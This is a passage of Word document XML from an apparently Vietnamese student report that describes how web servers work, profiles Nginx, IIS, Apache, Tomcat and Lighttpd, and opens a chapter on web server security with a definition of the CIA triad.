          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vai trò của trình duyệt Web là tìm Web Server nơi chứa dữ liệu trang Web. Khi trình duyệt tìm thấy server sẽ gửi yêu cầu và xử lí thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313D4819" w14:textId="3793C0AF" w:rsidR="00E213BC" w:rsidRDefault="00E213BC" w:rsidP="00EA572C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E213BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79FE6BE5" wp14:editId="307E1B1E">
            <wp:extent cx="4587638" cy="1493649"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="64690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00113" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4587638" cy="1493649"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDF7B4F" w14:textId="3B30C936" w:rsidR="00EA572C" w:rsidRPr="00F66124" w:rsidRDefault="00DD085D" w:rsidP="00DD085D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc170814805"/>
      <w:r>
        <w:t xml:space="preserve">Hình 1. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_1. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00217160">
        <w:t>Cách thức hoạt động của Web Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="14B1ACB1" w14:textId="3E70B2D0" w:rsidR="005E78AC" w:rsidRDefault="005E78AC" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="11" w:name="_Toc171085480"/>
      <w:r>
        <w:t>Các loại Web Server phổ biến</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="50B07DBB" w14:textId="60BE188E" w:rsidR="00697866" w:rsidRDefault="005F50A7" w:rsidP="007A4C08">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hiện nay có rất nhiều các Web Server phổ biến dưới đây là 5 loại Web Server được thông dụng nhất hiện nay:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9FCF35" w14:textId="4298EC32" w:rsidR="005F50A7" w:rsidRPr="005C69F7" w:rsidRDefault="005C69F7" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00830CAC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web Server Nginx:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Là máy chủ mã nguồn mở. Được công bố lần đầu vào 2004 với các ưu điểm như tính ổn định, hiệu suất cao, tài nguyên sử dụng thấp. Nginx sử dụng kiến trúc theo hướng sự kiện, cho phép mở rộng để xử lí yêu cầu một cách đơn giản hơn, làm giảm được độ phức tạp</w:t>
      </w:r>
      <w:r w:rsidR="003A161E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A210C09" w14:textId="4F59E869" w:rsidR="00566828" w:rsidRDefault="007C5553" w:rsidP="003B1D5E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F66D12A" wp14:editId="11774233">
            <wp:extent cx="2804160" cy="1646718"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2122824885" name="Picture 1" descr="What is Nginx Web Server? [Explained in Simpl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ginx Web Server? [Explained in Simple Ter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0848" cy="1656518"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C1F358" w14:textId="3F604771" w:rsidR="005B7C21" w:rsidRPr="003B1D5E" w:rsidRDefault="00DD085D" w:rsidP="00DD085D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc170814806"/>
      <w:r>
        <w:t xml:space="preserve">Hình 1. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_1. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="005B7C21">
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="73339E29" w14:textId="6F74625F" w:rsidR="005C69F7" w:rsidRPr="00E42A3E" w:rsidRDefault="003A161E" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00830CAC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web Server Internet Information Services (IIS):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Là phần mềm được Microsoft phát triển, bao gồm các dịch vụ khác nhau như Web Server và FTP Server. Vì được thiết kế theo hướng cấu trúc từng phần nên các tính năng trong Web Server IIS là độc lập với nhau. Chúng ta có thể chỉnh sửa, thêm, xóa hoặc thay thế các tính năng của Web Server này theo từng nhu cầu. Với các tích hợp ASP.NET, Web Server IIS đang hỗ trợ rất tốt cho người dùng. Thông qua giao diện quen thuộc, người dùng dễ đang quản trị Web Server và tận dùng được các ứng dụng bên trong ASP.NET.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F76050" w14:textId="55BB0BA0" w:rsidR="00E42A3E" w:rsidRDefault="00E42A3E" w:rsidP="003B1D5E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23DBC583" wp14:editId="6BA32FE0">
            <wp:extent cx="3031237" cy="1684020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="202223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0587" cy="1694770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74462EF6" w14:textId="5D091B87" w:rsidR="00E42A3E" w:rsidRPr="00E42A3E" w:rsidRDefault="00DD085D" w:rsidP="00DD085D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc170814807"/>
      <w:r>
        <w:t xml:space="preserve">Hình 1. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_1. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F60CAE">
        <w:t>Microsoft IIS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="2F8EF574" w14:textId="28D69E75" w:rsidR="00E42A3E" w:rsidRPr="003B1D5E" w:rsidRDefault="00202904" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00830CAC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web Server Apache HTTP Server:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tên ngắn gọn là Apache, đây là phần mềm được sử dụng phổ biến nhất trên thế giới. Tính đến 2018 Apache đã phục vụ hơn 54% Website hoạt động. Là một máy chủ mã nguồn mở do Apache Software Foundation bảo trợ. Hiện nay, Web Server đã được vận hành trên nhiều nền tảng khác nhau như Windows, Linux,…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465AB2E5" w14:textId="621853A0" w:rsidR="003B1D5E" w:rsidRDefault="00B8060D" w:rsidP="00B8060D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A571B68" wp14:editId="4FBEB450">
            <wp:extent cx="3030220" cy="1511300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1900848472" name="Picture 5" descr="How to launch an Apache Web Server from the CLI | by Marshall Hubbard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launch an Apache Web Server from the CLI | by Marshall Hubbard |  Nerd For Tech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220" cy="1511300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A74D72A" w14:textId="737349D1" w:rsidR="00B8060D" w:rsidRPr="003B1D5E" w:rsidRDefault="00DD085D" w:rsidP="00DD085D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc170814808"/>
      <w:r>
        <w:t xml:space="preserve">Hình 1. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_1. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="004E2E21">
        <w:t>Apache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="1711D2F5" w14:textId="13C23442" w:rsidR="003B1D5E" w:rsidRPr="00F27410" w:rsidRDefault="00F27410" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00830CAC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web Server Apache Tomcat:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Được Apache Software Foundation phát triển. Máy chủ mã nguồn mở Tomcat hoạt động với ngôn ngữ Java thuần túy, phục vụ tốt cho các Web phát triển từ Java và hỗ trợ nhiều loại hệ điều hành phổ biến hiện nay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D579D38" w14:textId="534EFCC8" w:rsidR="00F27410" w:rsidRDefault="00F27410" w:rsidP="00F27410">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29187015" wp14:editId="31C51BEE">
            <wp:extent cx="3086099" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="648229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783" cy="1720991"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74341602" w14:textId="732FD87B" w:rsidR="00D97204" w:rsidRPr="00F27410" w:rsidRDefault="00DD085D" w:rsidP="00DD085D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc170814809"/>
      <w:r>
        <w:t xml:space="preserve">Hình 1. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_1. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F702E5">
        <w:t>Tomcat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="7ED7E913" w14:textId="3FB224E4" w:rsidR="00F27410" w:rsidRPr="004054DE" w:rsidRDefault="004054DE" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00830CAC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Web Server Lighttpd:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Là một phần mềm mã nguồn mở có độ an toàn và linh hoạt cao. Lighttpd được viết bởi Jan Kneschke. Ưu điểm lớn nhất của Web Server này là tiết kiệm tài nguyên, không cần cấu hình quá cao. Lighttpd được viết theo ngôn ngữ C, tương thích với nhiều hệ điều hành thông dụng và được tích hợp SCGI, FasstCGI, CGI cho phép chạy ứng dụng Web được viết trên bất kì ngôn ngữ nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579BBCEF" w14:textId="4E7EE7D3" w:rsidR="004054DE" w:rsidRDefault="00C420ED" w:rsidP="00C420ED">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62CE60B6" wp14:editId="20484F04">
            <wp:extent cx="3208020" cy="2188481"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="168515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7265" cy="2215253"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00213D44" w14:textId="6D2A56BC" w:rsidR="00503097" w:rsidRPr="002B7B81" w:rsidRDefault="00DD085D" w:rsidP="002B7B81">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc170814810"/>
      <w:r>
        <w:t xml:space="preserve">Hình 1. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_1. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00824A3B">
        <w:t>Lighttpd</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidR="00430B84">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="309DEC12" w14:textId="06104337" w:rsidR="00AB7357" w:rsidRDefault="00AB7357" w:rsidP="00AB7357">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc171085481"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CHƯƠNG 2: TỔNG QUAN VỀ BẢO MẬT WEB SERVER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="4B8B5A6C" w14:textId="77777777" w:rsidR="00AB7357" w:rsidRPr="00AB7357" w:rsidRDefault="00AB7357" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc171085482"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="517602C0" w14:textId="5CE4D8B9" w:rsidR="00AB7357" w:rsidRDefault="00AB7357" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="19" w:name="_Toc171085483"/>
      <w:r>
        <w:t>Khái niệm về bảo mật</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="0D641343" w14:textId="2123604B" w:rsidR="00AB7357" w:rsidRDefault="00FE1CFF" w:rsidP="007A4C08">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bảo mật l</w:t>
      </w:r>
      <w:r w:rsidRPr="006E363A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">à sự bảo vệ thông tin và các hệ thống thông tin tránh bị truy nhập, sử dụng, tiết lộ, gián đoạn, sửa đổi hoặc phá hoại trái phép </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nhằm</w:t>
      </w:r>
      <w:r w:rsidRPr="006E363A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> đảm bảo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> đạt được 3 tiêu chí chúng được biết đến với cái tên là </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“C.I.A triad”</w:t>
      </w:r>
      <w:r w:rsidR="000E1DFB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4562E0E2" w14:textId="4F3B0E4E" w:rsidR="000E1DFB" w:rsidRDefault="00D76898" w:rsidP="007A4C08">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">C.I.A triad </w:t>
      </w:r>
      <w:r w:rsidR="000B7746">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>viết tắt cho ba tính chất: Confidentiality</w:t>
      </w:r>
      <w:r w:rsidRPr="006E363A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7746">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="006E363A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">tính </w:t>
      </w:r>
      <w:r w:rsidR="000B7746">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bí mật)</w:t>
      </w:r>
      <w:r w:rsidRPr="006E363A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="000B7746">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r w:rsidR="00C105FC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vailabilty</w:t>
      </w:r>
      <w:r w:rsidRPr="006E363A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C105FC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="006E363A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">tính </w:t>
      </w:r>
      <w:r w:rsidR="00C105FC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sẵn sàng)</w:t>
      </w:r>
      <w:r w:rsidRPr="006E363A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="00C105FC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Intergrity (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E363A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tính khả dụng</w:t>
      </w:r>
      <w:r w:rsidR="00C105FC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="006E363A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> của thông tin</w:t>
      </w:r>
      <w:r w:rsidR="007A4C08">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72941412" w14:textId="737682FA" w:rsidR="00D76898" w:rsidRPr="00036727" w:rsidRDefault="00036727" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00E67EB7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tính bí mật (Confidentiality):</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67EB7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thông tin chỉ được phép cung cấp cấp cho người có thẩm quyền</w:t>
      </w:r>
      <w:r w:rsidR="003C27D3" w:rsidRPr="00E67EB7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
